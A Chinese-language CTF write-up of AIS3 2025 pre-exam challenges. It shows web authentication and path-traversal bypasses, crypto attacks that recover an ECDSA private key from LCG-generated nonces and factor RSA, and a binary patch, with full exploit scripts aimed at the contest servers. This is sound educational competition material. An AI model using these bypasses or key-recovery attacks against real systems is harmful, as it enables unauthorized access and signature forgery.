Web#

這題原本是黑箱之後才公開source 但我在這之前就解掉了,所以這邊我就不提供source

進去會看到登入畫面 CleanShot 2025-05-28 at 15.27.12@2x

登入guest/guest: CleanShot 2025-05-28 at 15.35.57@2x

輸入完2FA code, 會被導到dashboard CleanShot 2025-05-28 at 15.36.59@2x

回到登入頁面, 本來想說隨便試試看, 輸入admin/admin 然後就不小心登入了

同樣是一個要輸入2FA的地方 CleanShot 2025-05-28 at 15.32.38@2x

之前有刷過ching的2023 AIS3 pre-exam題目, 裡面有提跟這幾乎一模一樣

同樣先登入admin/admin, 但在2FA的地方直接帶著成功登入的token進去dashboard.php

雖然會直接被redirect回2fa.php, 但用burp可以攔截到 CleanShot 2025-05-28 at 15.43.13@2x

Flag: AIS3{1.Es55y_SQL_1nJ3ct10n_w1th_2fa_IuABDADGeP0}

Tomorin DB#

題目的結構長這樣: CleanShot 2025-05-28 at 15.46.17@2x

main.go:

1
package main
2

3
import "net/http"
4

5
func main() {
6
  http.Handle("/", http.FileServer(http.Dir("/app/Tomorin")))
7
  http.HandleFunc("/flag", func(w http.ResponseWriter, r *http.Request) {
8
    http.Redirect(w, r, "https://youtu.be/lQuWN0biOBU?si=SijTXQCn9V3j4Rl6", http.StatusFound)
9
    })
10
    http.ListenAndServe(":30000", nil)
11
}

本來想說用/./flag但發現沒辦法，丟給GPT問還有甚麼方法

結果他用/%2e/flag可以過。仔細研究發現是因為/%2e/flag在ServeMux不會被轉為/flag

之後再進入cleanPath，他就會把., //之類的方法清掉了，但他只用”字串層面”找，所以%2e可以繞過

反正就挺酷的

Flag: AIS3{G01ang_H2v3_a_c0O1_way!!!_Us3ing_C0NN3ct_M3Th07_L0l@T0m0r1n_1s_cute_D0_yo7_L0ve_t0MoRIN?}

Misc#

Ramen CTF#

題目附了一個照片, 要找出在哪裡吃的以及點了什麼 chal

使用google lens掃描發票的QRcode, 可以得到:

1
MF1687991111404137095000001f4000001f40000000034785923VG9sG89nFznfPnKYFRlsoA==:**:2:2:1:蝦拉

對店名最相關的應該就是發票上的賣方, 在對應到QRcode, 推測賣方統編應該是34785923

在拿這串統邊去財政部營業人統一編號查詢系統找, 得到店名為 CleanShot 2025-05-31 at 09.20.20@2x

拿店名去搜尋, 發現什麼都沒有, 我就嘗試去google map拿登記地址去找

發現附近好像只有”樂山溫泉拉麵”

拿者個店名去查, 果然出現不少東西

上面QRcode有掃出一個”蝦拉”, 推測菜名應該跟這有關

然後我就找到:

Flag: AIS3{樂山溫泉拉麵:蝦拉麵}

AIS3 Tiny Server - Web / Misc#

這是一道題組, 付了一個檔案和網址(檔案是給AIS3 Tiny Server - rev用的)

CleanShot 2025-05-31 at 09.42.17@2x

完全不知道在幹嘛, 因為聽別人說不建議逆他給的檔案, 所以我就純黑箱看

因為不知道要幹嘛, 就隨便亂碰碰看path traversel, 發現可以用URL encode到根目錄 CleanShot 2025-05-31 at 09.45.19@2x

再看到flag

CleanShot 2025-05-31 at 09.45.54@2x

Flag: AIS3{tInY_we8_s3RveR_WitH_FIl3_8rOWs1ng_a5_@_Fe4TuR3}

Welcome#

Flag: AIS3{Welcome_And_Enjoy_The_CTF_!}

Crypto#

Stream#

chal:

1
from random import getrandbits
2
import os
3
from hashlib import sha512
4
from flag import flag
5

6
def hexor(a: bytes, b: int):
7
    return hex(int.from_bytes(a)^b**2)
8

9
for i in range(80):
10
    print(hexor(sha512(os.urandom(True)).digest(), getrandbits(256)))
11

12
print(hexor(flag, getrandbits(256)))

加密方法: $\text{ciphertext} = \text{Flag} \oplus R^{2}$

$R^{2}$ 跟flag比大很多bit,而XOR只會運算道比較小的位元

所以 $\text{ciphertext}$ 跟 $R^{2}$ 會差不多,爆破他們之間的距離即可

1
import math
2
ciphertext = "0x1a95888d32cd61925d40815f139aeb35d39d8e33f7e477bd020b88d3ca4adee68de5a0dee2922628da3f834c9ada0fa283e693f1deb61e888423fd64d5c3694"
3

4
C_flag = int(ciphertext, 16)
5

6
approx_R = int(math.isqrt(C_flag))
7

8
delta_range = 500000
9
found_flag = None
10

11
for delta in range(-delta_range, delta_range + 1):
12
    potential_R = approx_R + delta
13

14
    if potential_R < 0:
15
        continue
16

17
    potential_R_squared = potential_R ** 2
18
    potential_flag_int = C_flag ^ potential_R_squared
19

20
    try:
21
        padded_flag_bytes = potential_flag_int.to_bytes(64, 'big')
22

23
        if b'AIS3{' in padded_flag_bytes:
24
            start_index = padded_flag_bytes.find(b'AIS3{')
25

26
            is_printable = True
27
            for char_val in padded_flag_bytes[start_index:]:
28
                if not (32 <= char_val <= 126 or char_val == 0):
29
                    is_printable = False
30
                    break
31

32
            if is_printable:
33
                decoded_flag = padded_flag_bytes.decode('utf-8', errors='ignore')
34
                print(decoded_flag)
35

36
    except OverflowError:
37
        pass
38
    except UnicodeDecodeError:
39
        pass

Flag: AIS3{no_more_junks…plz}

Hill#

chal:

1
import numpy as np
2

3
p = 251
4
n = 8
5

6

7
def gen_matrix(n, p):
8
    while True:
9
        M = np.random.randint(0, p, size=(n, n))
10
        if np.linalg.matrix_rank(M % p) == n:
11
            return M % p
12

13
A = gen_matrix(n, p)
14
B = gen_matrix(n, p)
15

16
def str_to_blocks(s):
17
    data = list(s.encode())
18
    length = ((len(data) - 1) // n) + 1
19
    data += [0] * (n * length - len(data))  # padding
20
    blocks = np.array(data, dtype=int).reshape(length, n)
21
    return blocks
22

23
def encrypt_blocks(blocks):
24
    C = []
25
    for i in range(len(blocks)):
26
        if i == 0:
27
            c = (A @ blocks[i]) % p
28
        else:
29
            c = (A @ blocks[i] + B @ blocks[i-1]) % p
30
        C.append(c)
31
    return C
32

33
flag = "AIS3{Fake_FLAG}"
34
blocks = str_to_blocks(flag)
35
ciphertext = encrypt_blocks(blocks)
36

37
print("Encrypted flag:")
38
for c in ciphertext:
39
    print(c)
40

41
t = input("input: ")
42
blocks = str_to_blocks(t)
43
ciphertext = encrypt_blocks(blocks)
44
for c in ciphertext:
45
    print(c)

第0個區塊:

C_{0}=(A\times P_{0})\text{mod}\; p

第i(非0)個區塊:

C_{} = (A \times P_{i}+B \times P_{i-1})\text{mod}\; p

拿到A,B就可以得到flag

可以傳入basis vector，這樣就可以直接噴出來了:

A \;=\; \begin{bmatrix} a_{0,0} & a_{0,1} & \cdots & a_{0,7} \\ a_{1,0} & a_{1,1} & \cdots & a_{1,7} \\ \vdots & \vdots & \ddots & \vdots \\ a_{7,0} & a_{7,1} & \cdots & a_{7,7} \end{bmatrix}, \quad e_3 = \begin{bmatrix}0\\0\\0\\1\\0\\0\\0\\0\end{bmatrix} \;\Longrightarrow\; A\,e_3 = \begin{bmatrix} a_{0,3} \\ a_{1,3} \\ a_{2,3} \\ a_{3,3} \\ a_{4,3} \\ a_{5,3} \\ a_{6,3} \\ a_{7,3} \end{bmatrix}

剩下反向操作即可，感謝我大GPT

1
import numpy as np
2
import sympy
3
from pwn import remote
4

5
p = 251
6
n = 8
7

8
def parse_line(line):
9
    s = line.decode().strip()
10
    if s.startswith('[') and s.endswith(']'):
11
        s = s[1:-1]
12
    return [int(x) for x in s.split()]
13

14
def mat_mul(M, v):
15
    return [(sum(M[i][j] * v[j] for j in range(n)) % p) for i in range(n)]
16

17
def vec_sub(v1, v2):
18
    return [(v1[i] - v2[i]) % p for i in range(len(v1))]
19

20
def solve():
21
    conn = remote("chals1.ais3.org", 18000)
22

23
    # Extract flag ciphertext
24
    initial = conn.recvuntil(b"input: ")
25
    lines = initial.split(b'\n')
26

27
    flag_blocks = []
28
    start = next(i for i, line in enumerate(lines) if b"Encrypted flag:" in line) + 1
29
    for line in lines[start:]:
30
        s = line.decode().strip()
31
        if not s or "input:" in s:
32
            break
33
        if s.startswith('[') or s[0].isdigit():
34
            flag_blocks.append(parse_line(line))
35

36
    # Send basis vectors payload
37
    payload = []
38
    for i in range(n):
39
        basis = [0] * n
40
        basis[i] = 1
41
        payload.extend(basis + [0] * n)
42

43
    conn.sendline(bytes(payload))
44
    response = conn.recvall(timeout=5)
45

46
    # Parse response blocks
47
    response_blocks = [parse_line(line) for line in response.strip().split(b'\n') if line.strip()]
48

49
    # Reconstruct matrices A and B
50
    A_cols = [response_blocks[2*i] for i in range(n)]
51
    B_cols = [response_blocks[2*i+1] for i in range(n)]
52

53
    A = [list(col) for col in zip(*A_cols)]
54
    B = [list(col) for col in zip(*B_cols)]
55

56
    # Compute A^-1
57
    A_inv = sympy.Matrix(A).inv_mod(p).tolist()
58

59
    # Decrypt flag blocks
60
    decrypted = []
61
    decrypted.append(mat_mul(A_inv, flag_blocks[0]))
62

63
    for i in range(1, len(flag_blocks)):
64
        BP = mat_mul(B, decrypted[i-1])
65
        term = vec_sub(flag_blocks[i], BP)
66
        decrypted.append(mat_mul(A_inv, term))
67

68
    # Convert to flag
69
    flag_bytes = [b for block in decrypted for b in block]
70
    while flag_bytes and flag_bytes[-1] == 0:
71
        flag_bytes.pop()
72

73
    flag = bytes(flag_bytes).decode('utf-8', errors='replace')
74
    print(flag)
75

76
    conn.close()
77

78
if __name__ == '__main__':
79
    solve()

SlowECDSA#

chal:

1
#!/usr/bin/env python3
2

3
import hashlib, os
4
from ecdsa import SigningKey, VerifyingKey, NIST192p
5
from ecdsa.util import number_to_string, string_to_number
6
from Crypto.Util.number import getRandomRange
7
from flag import flag
8

9
FLAG = flag
10

11
class LCG:
12
    def __init__(self, seed, a, c, m):
13
        self.state = seed
14
        self.a = a
15
        self.c = c
16
        self.m = m
17

18
    def next(self):
19
        self.state = (self.a * self.state + self.c) % self.m
20
        return self.state
21

22
curve = NIST192p
23
sk = SigningKey.generate(curve=curve)
24
vk = sk.verifying_key
25
order = sk.curve.generator.order()
26

27
lcg = LCG(seed=int.from_bytes(os.urandom(24), 'big'), a=1103515245, c=12345, m=order)
28

29
def sign(msg: bytes):
30
    h = int.from_bytes(hashlib.sha1(msg).digest(), 'big') % order
31
    k = lcg.next()
32
    R = k * curve.generator
33
    r = R.x() % order
34
    s = (pow(k, -1, order) * (h + r * sk.privkey.secret_multiplier)) % order
35
    return r, s
36

37
def verify(msg: str, r: int, s: int):
38
    h = int.from_bytes(hashlib.sha1(msg.encode()).digest(), 'big') % order
39
    try:
40
        sig = number_to_string(r, order) + number_to_string(s, order)
41
        return vk.verify_digest(sig, hashlib.sha1(msg.encode()).digest())
42
    except:
43
        return False
44

45
example_msg = b"example_msg"
46
print("==============SlowECDSA===============")
47
print("Available options: get_example, verify")
48

49
while True:
50
    opt = input("Enter option: ").strip()
51

52
    if opt == "get_example":
53
        print(f"msg: {example_msg.decode()}")
54
        example_r, example_s = sign(example_msg)
55
        print(f"r: {hex(example_r)}")
56
        print(f"s: {hex(example_s)}")
57

58
    elif opt == "verify":
59
        msg = input("Enter message: ").strip()
60
        r = int(input("Enter r (hex): ").strip(), 16)
61
        s = int(input("Enter s (hex): ").strip(), 16)
62

63
        if verify(msg, r, s):
64
            if msg == "give_me_flag":
65
                print("✅ Correct signature! Here's your flag:")
66
                print(FLAG.decode())
67
            else:
68
                print("✔️ Signature valid, but not the target message.")
69
        else:
70
            print("❌ Invalid signature.")
71

72
    else:
73
        print("Unknown option. Try again.")

曲線：NIST192p，基數 n = order
私鑰：d = sk.privkey.secret_multiplier
隨機數 k：不是隨機呼叫 os.urandom()，而是經LCG依序產生

k_{i+1} \equiv (A k_i + C) \pmod{n},\quad A = 1103515245,\; C = 12345

簽章公式

\begin{aligned} r_i &= (k_i G)_x \bmod n\\ s_i &= k_i^{-1}\,\bigl(h_i + r_i d\bigr) \bmod n\\ \end{aligned}

(其中 $h_i = \operatorname{SHA1}(m_i)\bmod n$ )

LCG為線性遞迴，只要抓到一組 $(k_1,k_2)$ 便能推出參數或直接預測下一值

伺服器允許同一訊息多次簽章，產生連續的 $k_1, k_2$

hash相同(訊息一樣），化簡推導相當容易

設兩次簽章皆用訊息 example_msg，得到

\bigl(r_1,s_1,k_1\bigr),\quad \bigl(r_2,s_2,k_2\bigr),\; k_2 = Ak_1 + C \pmod n

且 $h = \operatorname{SHA1}(\text{example_msg}) \bmod n$

\begin{aligned} s_1 k_1 &= h + r_1 d \pmod n\\ s_2 k_2 &= h + r_2 d \pmod n\\ \end{aligned}

整理：

d = \frac{s_1 k_1 - s_2 k_2}{r_1 - r_2} \pmod n

代回第一條式子 $s_1 k_1 = h + r_1 d$ ：

s_1 k_1 = h + r_1\, \frac{s_1 k_1 - s_2 (A k_1 + C)}{r_1 - r_2} \pmod n

得一次方程

k_1\,(s_1 r_2 - A s_2 r_1) =h(r_2 - r_1) + C\,s_2 r_1 \pmod n

k_1 = \frac{h(r_2 - r_1) + C s_2 r_1} {s_1 r_2 - A s_2 r_1} \pmod n

程式裡以 pow(den, -1, n) 取逆元即完成

有了 $k_1$ ，直接用標準式

d = (s_1 k_1 - h) \, r_1^{-1} \pmod n

k_{\text{flag}} = A k_2 + C \pmod n

計算

\begin{aligned} r_{\text{flag}} &= (k_{\text{flag}} G)_x \bmod n \\ s_{\text{flag}} &= k_{\text{flag}}^{-1}\, \bigl(h_{\text{flag}} + r_{\text{flag}} d\bigr) \bmod n \end{aligned}

exploit:

1
from pwn import remote
2
import hashlib
3
from ecdsa import NIST192p
4

5
A_LCG = 1103515245
6
C_LCG = 12345
7
curve = NIST192p
8
ORDER = curve.order
9
G = curve.generator
10

11
def get_example_sig(p):
12
    p.sendlineafter(b"Enter option: ", b"get_example")
13
    p.recvuntil(b"msg: ")
14
    msg_str = p.recvline().strip().decode()
15
    p.recvuntil(b"r: ")
16
    r_hex = p.recvline().strip().decode()
17
    p.recvuntil(b"s: ")
18
    s_hex = p.recvline().strip().decode()
19
    return msg_str.encode(), int(r_hex, 16), int(s_hex, 16)
20

21
def verify_sig(p, msg_str, r_val, s_val):
22
    p.sendlineafter(b"Enter option: ", b"verify")
23
    p.sendlineafter(b"Enter message: ", msg_str.encode())
24
    p.sendlineafter(b"Enter r (hex): ", hex(r_val).encode())
25
    p.sendlineafter(b"Enter s (hex): ", hex(s_val).encode())
26
    return p.recvall(timeout=2)
27

28
def main():
29
    p = remote('chals1.ais3.org', 19000)
30

31
    msg_ex_bytes, r1, s1 = get_example_sig(p)
32
    _, r2, s2 = get_example_sig(p)
33

34
    h_ex = int.from_bytes(hashlib.sha1(msg_ex_bytes).digest(), 'big') % ORDER
35

36
    # Recover k1
37
    term1 = (h_ex * r2 - h_ex * r1 + C_LCG * s2 * r1) % ORDER
38
    term2 = (s1 * r2 - A_LCG * s2 * r1) % ORDER
39
    k1 = (term1 * pow(term2, -1, ORDER)) % ORDER
40

41
    # Recover private key d
42
    d = ((s1 * k1 - h_ex) % ORDER * pow(r1, -1, ORDER)) % ORDER
43

44
    # Predict next nonce
45
    k2 = (A_LCG * k1 + C_LCG) % ORDER
46
    k_flag = (A_LCG * k2 + C_LCG) % ORDER
47

48
    # Sign "give_me_flag"
49
    msg_flag = "give_me_flag"
50
    h_flag = int.from_bytes(hashlib.sha1(msg_flag.encode()).digest(), 'big') % ORDER
51

52
    R_flag_point = G * k_flag
53
    r_flag = R_flag_point.x() % ORDER
54
    s_flag = (pow(k_flag, -1, ORDER) * (h_flag + r_flag * d)) % ORDER
55

56
    response = verify_sig(p, msg_flag, r_flag, s_flag)
57
    print(response.decode())
58
    p.close()
59

60
if __name__ == "__main__":
61
    main()

Flag: AIS3{Aff1n3_nounc3s_c@N_bE_broke_ezily…}

Random RSA#

chal:

1
from Crypto.Util.number import getPrime, bytes_to_long
2
from sympy import nextprime
3
from gmpy2 import is_prime
4

5
FLAG = b"AIS3{Fake_FLAG}"
6

7
a = getPrime(512)
8
b = getPrime(512)
9
m = getPrime(512)
10
a %= m
11
b %= m
12
seed = getPrime(300)
13

14
rng = lambda x: (a*x + b) % m
15

16

17
def genPrime(x):
18
    x = rng(x)
19
    k=0
20
    while not(is_prime(x)):
21
        x = rng(x)
22
    return x
23

24
p = genPrime(seed)
25
q = genPrime(p)
26

27
n = p * q
28
e = 65537
29
m_int = bytes_to_long(FLAG)
30
c = pow(m_int, e, n)
31

32
# hint
33
seed = getPrime(300)
34
h0 = rng(seed)
35
h1 = rng(h0)
36
h2 = rng(h1)
37

38
with open("output.txt", "w") as f:
39
    f.write(f"h0 = {h0}\n")
40
    f.write(f"h1 = {h1}\n")
41
    f.write(f"h2 = {h2}\n")
42
    f.write(f"M = {m}\n")
43
    f.write(f"n = {n}\n")
44
    f.write(f"e = {e}\n")
45
    f.write(f"c = {c}\n")

output:

1
h0 = 2907912348071002191916245879840138889735709943414364520299382570212475664973498303148546601830195365671249713744375530648664437471280487562574592742821690
2
h1 = 5219570204284812488215277869168835724665994479829252933074016962454040118179380992102083718110805995679305993644383407142033253210536471262305016949439530
3
h2 = 3292606373174558349287781108411342893927327001084431632082705949610494115057392108919491335943021485430670111202762563173412601653218383334610469707428133
4
M = 9231171733756340601102386102178805385032208002575584733589531876659696378543482750405667840001558314787877405189256038508646253285323713104862940427630413
5
n = 20599328129696557262047878791381948558434171582567106509135896622660091263897671968886564055848784308773908202882811211530677559955287850926392376242847620181251966209002883852930899738618123390979377039185898110068266682754465191146100237798667746852667232289994907159051427785452874737675171674258299307283
6
e = 65537
7
c = 13859390954352613778444691258524799427895807939215664222534371322785849647150841939259007179911957028718342213945366615973766496138577038137962897225994312647648726884239479937355956566905812379283663291111623700888920153030620598532015934309793660829874240157367798084893920288420608811714295381459127830201

根據LCG定義, $x_{k+1} = a \times x_{k} + b \;(\text{mod} \;m)$

chal裡面h0為LCG初始值,其餘類推

h_{2}-h_{1}=a(h_1-h_0)\;(\text{mod} \;m)

所以 $a=(h_{2}-h_{1})(h_{1}-h_{0})^{-1}\;(\text{mod} \;m)$

$b=h_1-a\times h_0\;(\text{mod} \;m)$

第一次 LCG 輸出為 $h_0 = a\,x_0 + b \pmod m$

a\,x_0 \;\equiv\; h_0 - b \pmod m \quad\Longrightarrow\quad x_0 \;\equiv\; (\,h_0 - b\,)\times a^{-1} \pmod m

只要 $\gcd(a,m)=1$ , 就可計算 $a^{-1}$ 以還原 $x_0$

計算出的 $x_0$ 小於m才有效

LCG 的第 $j$ 步輸出為

x_j \equiv a^j\,x_0 \;+\; b\,\frac{\,a^j - 1\,}{\,a - 1\,}\pmod m

RSA的 $p$ 就是某次 $x_j$

結合 $n=p\,q$ 可得到一元二次同餘

A_j\,p^2 + 2\,B_j\,p - n \;\equiv\;0\pmod m, \quad A_j=a^j,\;B_j=b\,(A_j-1)\;(a-1)^{-1}

判別式 $\Delta_j\equiv B_j^2 + 4\,A_j\,n\pmod m$

若非模 $m$ 下平方剩餘，則該 $j$ 可直接跳過；僅需對 $\Delta_j$ 為平方剩餘的 $j$ 試算平方根與驗證整除

1
from sympy.ntheory import sqrt_mod
2
from Crypto.Util.number import long_to_bytes
3

4
h0 = 2907912348071002191916245879840138889735709943414364520299382570212475664973498303148546601830195365671249713744375530648664437471280487562574592742821690
5
h1 = 5219570204284812488215277869168835724665994479829252933074016962454040118179380992102083718110805995679305993644383407142033253210536471262305016949439530
6
h2 = 3292606373174558349287781108411342893927327001084431632082705949610494115057392108919491335943021485430670111202762563173412601653218383334610469707428133
7
M = 9231171733756340601102386102178805385032208002575584733589531876659696378543482750405667840001558314787877405189256038508646253285323713104862940427630413
8
n = 20599328129696557262047878791381948558434171582567106509135896622660091263897671968886564055848784308773908202882811211530677559955287850926392376242847620181251966209002883852930899738618123390979377039185898110068266682754465191146100237798667746852667232289994907159051427785452874737675171674258299307283
9
e = 65537
10
c = 13859390954352613778444691258524799427895807939215664222534371322785849647150841939259007179911957028718342213945366615973766496138577038137962897225994312647648726884239479937355956566905812379283663291111623700888920153030620598532015934309793660829874240157367798084893920288420608811714295381459127830201
11

12
# Step 1: Recover LCG parameters
13
diff1 = (h1 - h0) % M
14
diff2 = (h2 - h1) % M
15
a = (diff2 * pow(diff1, -1, M)) % M
16
b = (h1 - a * h0) % M
17

18
print(f"[*] Recovered a: {a}")
19
print(f"[*] Recovered b: {b}")
20

21
# Step 2 & 3: Iterate on j and solve the congruence
22
inv_a_minus_1 = pow(a - 1, -1, M)
23
Aj = 1  # This will be a^j mod M
24

25
for j in range(1, 1001):
26
    Aj = (Aj * a) % M
27
    Bj = (b * (Aj - 1) * inv_a_minus_1) % M
28

29
    # Discriminant Dj = Bj^2 + 4*Aj*n mod M
30
    Dj = (pow(Bj, 2, M) + 4 * Aj * n) % M
31

32
    # Check if Dj is a quadratic residue
33
    if pow(Dj, (M - 1) // 2, M) != 1:
34
        continue
35

36
    print(f"\n[*] Found potential j = {j}")
37

38
    # Calculate the modular square roots
39
    y_roots = sqrt_mod(Dj, M, all_roots=True)
40
    if not y_roots:
41
        continue
42

43
    inv_2Aj = pow(2 * Aj, -1, M)
44

45
    # Step 4: Test candidates for p and decrypt
46
    for y in y_roots:
47
        p_cand = ((y - Bj) * inv_2Aj) % M
48

49
        if n % p_cand == 0:
50
            p = p_cand
51
            q = n // p
52

53
            # Sanity check if p and q are non-trivial factors
54
            if p != 1 and q != 1:
55
                print(f"[+] Successfully factored n!")
56
                print(f"[+] p = {p}")
57
                print(f"[+] q = {q}")
58

59
                phi = (p - 1) * (q - 1)
60
                d = pow(e, -1, phi)
61
                m_int = pow(c, d, n)
62
                flag = long_to_bytes(m_int)
63

64
                print(flag.decode())
65
                exit(0)

Flag: AIS3{1_d0n7_r34lly_why_1_d1dn7_u53_637pr1m3}

Rev#

Simple snake game#

題目給一個貪食蛇遊戲

能死三次 CleanShot 2025-05-27 at 08.57.35@2x

丟IDA, 追到main -> WinMain -> main_getcmdline -> SDL_main

1
int SDL_main()
2
{
3
  //省略變數宣告
4
  if ( (unsigned __int8)SnakeGame::Screen::init(v6) != 1 )
5
  {
6
    v8 = (SnakeGame::Snake *)"Error initializing screen";
7
    SDL_Log();
8
    lpuexcpt = -1;
9
  }
10
  else
11
  {
12
    v35 = 0;
13
    v22 = 1;
14
    v21 = 0;
15
    while ( !v35 && v26 > 0 )
16
    {
17
      SnakeGame::Screen::clear(v7);
18
      SnakeGame::Snake::draw((SnakeGame::Snake *)v29, v15);
19
      SnakeGame::Food::draw((SnakeGame::Food *)v29, v16);
20
      drawWalls(v23, v29);
21
      SnakeGame::Screen::update(v36, v26, 0, v17);
22
      if ( v22 )
23
      {
24
        v35 = holdGame((SnakeGame::Screen *)v29, 1500);
25
        v22 = 0;
26
      }
27
      switch ( SnakeGame::Screen::processEvents(v9) )
28
      {
29
        case 0:
30
          v35 = 1;
31
          break;
32
        case 1:
33
          if ( v27 != 1 )
34
            SnakeGame::Snake::updateDirection(0, (int)v15);
35
          break;
36
        case 2:
37
          if ( v27 != 1 )
38
            SnakeGame::Snake::updateDirection((SnakeGame::Snake *)1, (int)v15);
39
          break;
40
        case 3:
41
          if ( v27 != 1 )
42
            SnakeGame::Snake::updateDirection((SnakeGame::Snake *)2, (int)v15);
43
          break;
44
        case 4:
45
          if ( v27 != 1 )
46
            SnakeGame::Snake::updateDirection((SnakeGame::Snake *)3, (int)v15);
47
          break;
48
        case 5:
49
          v21 = 1;
50
          break;
51
        default:
52
          break;
53
      }
54
      if ( v21 )
55
        v35 = pauseGame((SnakeGame::Screen *)v29, &v21);
56
      Ticks = SDL_GetTicks();
57
      if ( !(Ticks / 10 % 6) )
58
      {
59
        if ( (unsigned __int8)SnakeGame::Snake::move(v7) != 1 )
60
        {
61
          resetLevel((SnakeGame::Snake *)v25, (SnakeGame::Food *)v24, &v22);
62
        }
63
        else
64
        {
65
          if ( (unsigned __int8)SnakeGame::Snake::collidesWith((SnakeGame::Snake *)v24, v15) )
66
          {
67
            SnakeGame::Food::Food(v10);
68
            SnakeGame::Food::operator=(v30);
69
            v36 = (SnakeGame::Screen *)((char *)v36 + SnakeGame::Food::S_VALUE);
70
            SnakeGame::Snake::addSection(v11);
71
          }
72
          v32 = v23;
73
          v20 = std::vector<SnakeGame::Wall *>::begin(v23);
74
          v19 = std::vector<SnakeGame::Wall *>::end(v32);
75
          while ( (unsigned __int8)__gnu_cxx::operator!=<SnakeGame::Wall **,std::vector<SnakeGame::Wall *>>(&v20, &v19) )
76
          {
77
            v31 = *(SnakeGame::Snake **)__gnu_cxx::__normal_iterator<SnakeGame::Wall **,std::vector<SnakeGame::Wall *>>::operator*(&v20);
78
            if ( (unsigned __int8)SnakeGame::Snake::collidesWith(v31, v15) )
79
              resetLevel((SnakeGame::Snake *)v25, (SnakeGame::Food *)v24, &v22);
80
            __gnu_cxx::__normal_iterator<SnakeGame::Wall **,std::vector<SnakeGame::Wall *>>::operator++(&v20);
81
          }
82
          for ( i = 1; ; ++i )
83
          {
84
            v1 = std::vector<SnakeGame::Section *>::size(&v28);
85
            if ( v1 <= i )
86
              break;
87
            v12 = *(SnakeGame::Snake **)std::vector<SnakeGame::Section *>::operator[](i);
88
            if ( (unsigned __int8)SnakeGame::Snake::collidesWith(v12, v15) )
89
              resetLevel((SnakeGame::Snake *)v25, (SnakeGame::Food *)v24, &v22);
90
          }
91
        }
92
      }
93
      if ( !v26 )
94
      {
95
        SnakeGame::Screen::clear(v7);
96
        SnakeGame::Screen::drawGameOver(v13);
97
        SnakeGame::Screen::update(v36, v26, 1, v17);
98
        holdGame((SnakeGame::Screen *)v29, 3000);
99
      }
100
    }
101
    freeWalls(v23);
102
    SnakeGame::Screen::close(v14);
103
    lpuexcpt = 0;
104
  }
105
  std::vector<SnakeGame::Wall *>::~vector(v23);
106
  SnakeGame::Snake::~Snake(v8);
107
  return lpuexcpt;
108
}

其中有一行:

1
v36 = (SnakeGame::Screen *)((char *)v36 + SnakeGame::Food::S_VALUE);

SnakeGame::Food::S_VALUE是50, 可以猜到v36應該是分數之類的

繼續猜應該會有一行v36 > ???處理”Win”的邏輯,但沒看到

只能往下追

1
if ( !v26 )
2
{
3
    SnakeGame::Screen::clear(v7);
4
    SnakeGame::Screen::drawGameOver(v13);
5
    SnakeGame::Screen::update(v36, v26, 1, v17);
6
    holdGame((SnakeGame::Screen *)v29, 3000);
7
}

著重看到update(), 裡面還調用到v36

1
int __userpurge SnakeGame::Screen::update@<eax>(_DWORD *a1@<ecx>, SnakeGame::Screen *this, int a3, char a4, bool a5)
2
{
3
  SDL_UpdateTexture(a1[2], 0, a1[6], 3200);
4
  SDL_RenderClear(a1[1]);
5
  SDL_RenderCopy(a1[1], a1[2]);
6
  if ( a4 != 1 )
7
    SnakeGame::Screen::drawText(this, a3, 0);
8
  return SDL_RenderPresent(a1[1]);
9
}

在繼續追到drawText()

1
void __userpurge SnakeGame::Screen::drawText(_DWORD *a1@<ecx>, SnakeGame::Screen *this, int a3, int a4)
2
{
3

4
  if ( (int)this <= 11451419 || a3 <= 19810 )
5
  {
6
    SnakeGame::Screen::createText[abi:cxx11](a1, this, a3);
7
    v27 = 0xFFFFFF;
8
    v8 = std::string::c_str(v28);
9
    a1[3] = TTF_RenderText_Solid(a1[5], v8, 0xFFFFFF);
10
    a1[4] = SDL_CreateTextureFromSurface(a1[1], a1[3]);
11
    v23 = 400;
12
    v24 = 565;
13
    v25 = 320;
14
    v26 = 30;
15
    SDL_RenderCopy(a1[1], a1[4]);
16
    std::string::~string(v28);
17
  }
18
  else
19
  {
20
    v14[0] = -831958911;
21
    v14[1] = -1047254091;
22
    v14[2] = -1014295699;
23
    v14[3] = -620220219;
24
    v14[4] = 2001515017;
25
    v14[5] = -317711271;
26
    v14[6] = 1223368792;
27
    v14[7] = 1697251023;
28
    v14[8] = 496855031;
29
    v14[9] = -569364828;
30
    v15 = 26365;
31
    v16 = 40;
32
    std::allocator<char>::allocator(&v29);
33
    std::string::basic_string(v14, 43, &v29);
34
    std::allocator<char>::~allocator(&v29);
35
    for ( i = 0; ; ++i )
36
    {
37
      v4 = std::string::length(v22);
38
      if ( i >= v4 )
39
        break;
40
      lpuexcpt = *(_BYTE *)std::string::operator[](i);
41
      v9 = SnakeGame::hex_array1[i];
42
      *(_BYTE *)std::string::operator[](i) = v9 ^ lpuexcpt;
43
    }
44
    v21 = 0xFFFFFF;
45
    v5 = std::string::c_str(v22);
46
    v31 = TTF_RenderText_Solid(a1[5], v5, v21);
47
    if ( v31 )
48
    {
49
      TextureFromSurface = SDL_CreateTextureFromSurface(a1[1], v31);
50
      if ( TextureFromSurface )
51
      {
52
        v17 = 200;
53
        v18 = 565;
54
        v19 = 590;
55
        v20 = 30;
56
        SDL_RenderCopy(a1[1], TextureFromSurface);
57
        SDL_FreeSurface(v31);
58
        SDL_DestroyTexture(TextureFromSurface);
59
      }
60
      else
61
      {
62
        lpuexcptb = (struct _Unwind_Exception *)std::operator<<<std::char_traits<char>>(
63
                                                  (std::ostream::sentry *)&std::cerr,
64
                                                  "SDL_CreateTextureFromSurface: ");
65
        Error = (char *)SDL_GetError();
66
        std::operator<<<std::char_traits<char>>((std::ostream::sentry *)lpuexcptb, Error);
67
        std::ostream::operator<<(std::endl<char,std::char_traits<char>>);
68
        SDL_FreeSurface(v31);
69
      }
70
    }
71
    else
72
    {
73
      lpuexcpta = (struct _Unwind_Exception *)std::operator<<<std::char_traits<char>>(
74
                                                (std::ostream::sentry *)&std::cerr,
75
                                                "TTF_RenderText_Solid: ");
76
      v6 = (char *)SDL_GetError();
77
      std::operator<<<std::char_traits<char>>((std::ostream::sentry *)lpuexcpta, v6);
78
      std::ostream::operator<<(std::endl<char,std::char_traits<char>>);
79
    }
80
    std::string::~string(v22);
81
  }
82
}

找到關鍵點if ( (int)this <= 11451419 || a3 <= 19810 )

再把這行patch掉，jle改jg

這樣一打開遊戲，flag就噴出來了

Flag: AIS3{CH3aT_Eng1n3?_0fcau53_I_bo_1T_by_hAnD}

AIS3 Tiny Server - Reverse#

題目給的檔案跟上面web的tiny server一樣

